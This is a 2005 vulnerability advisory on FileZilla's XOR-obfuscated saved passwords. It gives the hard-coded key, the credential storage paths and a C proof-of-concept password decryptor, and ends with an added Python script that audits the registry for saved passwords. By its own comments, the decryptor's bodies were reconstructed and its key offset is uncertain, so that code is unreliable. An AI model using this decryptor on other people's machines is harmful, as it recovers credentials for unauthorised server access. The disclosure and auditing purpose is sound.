Title: FileZilla weakly-encrypted password vulnerability
Risk: HIGH
Credits: pagvac (Adrian Pastor)
Date found: 6th August, 2005
Homepage: www.ikwt.com
          www.adrianpv.com
E-mail: m123303[ - at - ]richmond.ac.uk

Background
----------

FileZilla is the most active and most downloaded open source FTP/SFTP client (according to www.SourceForge.org at the time of writing). Currently there is only a Windows version of this client.

For some stats visit:
http://sourceforge.net/top/mostactive.php?type=week
http://sourceforge.net/top/toplist.php?type=downloads_week

The project page can be found at:
http://sourceforge.net/projects/filezilla/

This advisory plus PoC code and executable can be found at the following links:
http://www.ikwt.com/projects/filezilla-weak-encryption-research.zip
http://www.adrianpv.com/projects/filezilla-weak-encryption-research.zip

Versions affected
-----------------

This vulnerability has been successfully tested on versions 2.2.14b and 2.2.15. However, it is suspected that most previous versions are also affected.

Vulnerability summary
---------------------

- FileZilla client stores passwords using weak XOR "encryption"
- The value of the cipher key is static (it never changes) and can be found in the source code

Description of vulnerability
----------------------------

FileZilla saves configuration settings in two different locations:

- in an XML file
- in the Windows registry

The method used to save configuration settings depends on the preferences chosen by the user during the installation of FileZilla. Either way, all configuration settings are stored in cleartext, EXCEPT for the password. However, the password is stored using very weak XOR "encryption" which can be easily reversed. The problem with the way the XOR encryption is implemented is that the same cipher key is always used.
This key is hard-coded, which means that anyone can analyze the source code of the application and find it. Of course, this wouldn't be so easy if FileZilla weren't an open source application. Once the key is known, an attacker can use it to decrypt the password back to its cleartext form. Because the XOR algorithm used is symmetric, the same key is used for both encrypting and decrypting.

As mentioned before, the rest of the configuration settings are all in cleartext. Information that would be useful to an attacker includes the hostname of the server to connect to, the default port, and the username.

If successfully exploited, this vulnerability allows an attacker to access FTP (or SFTP) servers with the privileges of the user whose configuration settings were stolen. In practice, this vulnerability could be exploited after a machine has been compromised, or by fooling the user into executing malicious code. Such code could dump the configuration settings, decrypt the password(s) and send them all to the attacker.

It is common to see popular trojans that exploit weak-encryption vulnerabilities of this type. These trojans dump the credentials of popular applications such as Internet Explorer, VNC or even dialup connections. FileZilla could be the next application added to the list targeted by trojans with password-dumping features.

This vulnerability is somewhat similar to the one found by Conde Vampiro in VNC 3 back in 1999. It's similar because in both cases an open source application uses a fixed cipher key to decrypt passwords, which makes finding the key trivial. For more information on Conde Vampiro's findings visit:
http://www.securiteam.com/securitynews/3P5QERFQ0Q.html

Vulnerability details
---------------------

The XML configuration file is found at:
%programfiles%\FileZilla\FileZilla.xml

Where %programfiles% is the "program files" directory. This is usually "c:\program files" by default.
The configuration settings are saved in the registry in:
Hive: HKEY_CURRENT_USER
Key: Software\FileZilla\Site Manager\[site_name]\

Where [site_name] is the name given to the connection by the user.

The password is saved in the previous key as a value with the following properties:
Value: Pass
Type: REG_SZ (NULL-terminated string)

The cipher key can be found in Crypt.cpp and its value is:
"FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ"

Solution
--------

Choose "Use secure mode" during the installation (this stops FileZilla from saving passwords), lock down the client machines where the FileZilla client is installed, or update to a patched version which fixes this issue (if available).

PoC Code
--------

/*
Filename: filezilla-pwdec.c
Title: FileZilla Client - Weakly encrypted password exploit v0.01
Author: pagvac (Adrian Pastor)
Date: 8th August, 2005
License: GPL
email: m123303[-a-t-]richmond.ac.uk
homepage: www.ikwt.com (In Knowledge We Trust)
          www.adrianpv.com
Description: this tool asks the user for the "encrypted" password and computes the cleartext version of the password
Other info: compile as a Win32 console application project in Visual C++

Copyright (C) 2005 pagvac (Adrian Pastor)

This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
*/

//Includes (the archived copy of this advisory lost every "<...>" span,
//so the four header names below, and the bodies of the loops and of
//decrypt(), are rebuilt from the comments and description that survived)
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <windows.h>

//Macros
#define MAX_SIZE 150
#define SLEEP_TIME 5000

//Global variable (cypher key)
char *m_key = "FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ";

//PRE: decimal values representing ASCII chars,
//     every three digits becomes one ASCII char
//     e.g.: 042040063063
//POST: ASCII chars are copied back to buff[]
//      e.g.: *(??
//      the length of the new string is returned
int digit2char(char buff[])
{
    char tmp_buff[4], ascii_buff[MAX_SIZE];
    unsigned int i=0, j=0, n=0, len=(strlen(buff)/3);

    if(len>=MAX_SIZE)   //would overflow ascii_buff[]
        return 0;

    for(i=0,j=0;i<len;i++,j+=3)
    {
        //take the next three digits as one decimal number (000-255)
        strncpy(tmp_buff, buff+j, 3);
        tmp_buff[3]='\0';
        n=atoi(tmp_buff);
        ascii_buff[i]=(char)n;
    }
    ascii_buff[len]='\0';

    //copy the decoded bytes back over the digit string
    //(memcpy rather than strcpy, since a decoded byte may be 0)
    memcpy(buff, ascii_buff, len+1);
    return len;
}

//PRE: buff[] holds the stored password in its three-digits-per-char form
//POST: buff[] holds the cleartext password and its length is returned
//NOTE: rebuilt from the advisory's description: each byte is XORed with
//      the fixed key, reused from position 0; the starting key offset
//      FileZilla itself uses is not stated in this advisory
int decrypt(char buff[])
{
    unsigned int i=0, len=0, keylen=strlen(m_key);

    len=digit2char(buff);
    for(i=0;i<len;i++)
        buff[i]^=m_key[i%keylen];
    buff[len]='\0';
    return len;
}

int main(void)
{
    char cypher[MAX_SIZE*3+1];  //up to MAX_SIZE-1 chars, three digits each
    int i=0, len=0;

    printf("FileZilla Client - Weakly encrypted password exploit v0.01\n");
    printf("enter the stored password (digits only)\n>");
    if(scanf("%450s", cypher)!=1)   //450 == MAX_SIZE*3, bounds the read
        return 1;

    if(strlen(cypher)%3==0)
    {
        len=decrypt(cypher);
        printf("cleartext password:");
        for(i=0;i<len;i++)
            putchar(cypher[i]);
        printf("\n");
    }
    else
        printf("invalid input: length must be a multiple of three digits\n");

    Sleep(SLEEP_TIME);   //keep the console window open before exiting
    return 0;
}
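An added audit check, not from the advisory or the FileZilla project, that walks the Site Manager registry location given in the Vulnerability details section and reports which entries still carry a saved Pass value in the three-digits-per-byte form, without decoding it, so an administrator can confirm that "Use secure mode" is in effect on a machine. The registry path and value name come from the advisory; the SAMPLE_SITES data is constructed, and the winreg module is assumed to be present only on Windows (elsewhere the sample is audited instead).

```python
import re

try:
    import winreg  # Windows only; absent elsewhere, so the sample data is used
except ImportError:
    winreg = None

# Registry location named in the advisory, relative to HKEY_CURRENT_USER.
SITE_MANAGER_KEY = r"Software\FileZilla\Site Manager"
# Stored form the advisory describes: three decimal digits per password byte.
TRIPLET_RE = re.compile(r"^(?:[0-9]{3})+$")


def looks_xor_encoded(value):
    """True if value is in FileZilla's three-digits-per-byte stored form."""
    if not isinstance(value, str) or not TRIPLET_RE.match(value):
        return False
    return all(int(value[i:i + 3]) < 256 for i in range(0, len(value), 3))


def audit_sites(sites):
    """sites: {site_name: {value_name: data}} as read from the Site Manager key.
    Returns the names of entries whose 'Pass' value still holds a saved password."""
    return sorted(name for name, values in sites.items()
                  if looks_xor_encoded(values.get("Pass", "")))


def read_site_manager():
    """Enumerate the Site Manager key under HKEY_CURRENT_USER (Windows only)."""
    sites = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, SITE_MANAGER_KEY) as root:
        for i in range(winreg.QueryInfoKey(root)[0]):      # subkey count
            site = winreg.EnumKey(root, i)
            with winreg.OpenKey(root, site) as key:
                values = {}
                for j in range(winreg.QueryInfoKey(key)[1]):  # value count
                    name, data, _ = winreg.EnumValue(key, j)
                    values[name] = data
            sites[site] = values
    return sites


# Constructed sample standing in for a registry dump; not real credentials.
SAMPLE_SITES = {
    "intranet": {"Host": "ftp.example.test", "User": "alice", "Pass": "042040063063"},
    "mirror": {"Host": "mirror.example.test", "User": "anonymous", "Pass": ""},
}

if __name__ == "__main__":
    data = read_site_manager() if winreg else SAMPLE_SITES
    for site in audit_sites(data):
        print("saved password found in Site Manager entry:", site)
```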